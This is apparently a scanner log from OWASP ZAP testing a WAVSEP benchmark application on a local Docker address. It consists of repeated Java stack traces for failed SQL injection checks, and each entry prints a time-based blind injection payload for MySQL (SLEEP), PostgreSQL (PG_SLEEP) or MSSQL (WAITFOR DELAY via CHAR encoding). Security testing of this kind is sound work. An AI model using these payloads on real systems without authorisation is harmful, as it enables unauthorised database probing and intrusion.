org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680264 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');(SELECT * FROM (SELECT(SLEEP(5)))GqFM)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');(SELECT * FROM (SELECT(SLEEP(5)))GqFM)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680264 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';(SELECT * FROM (SELECT(SLEEP(5)))fxfT)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';(SELECT * FROM (SELECT(SLEEP(5)))fxfT)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680265 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';(SELECT * FROM (SELECT(SLEEP(5)))nLWU)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';(SELECT * FROM (SELECT(SLEEP(5)))nLWU)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680267 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;(SELECT * FROM (SELECT(SLEEP(5)))CzdY)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;(SELECT * FROM (SELECT(SLEEP(5)))CzdY)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680268 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680269 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680270 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680272 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680273 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680275 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680276 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680277 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680278 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680279 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 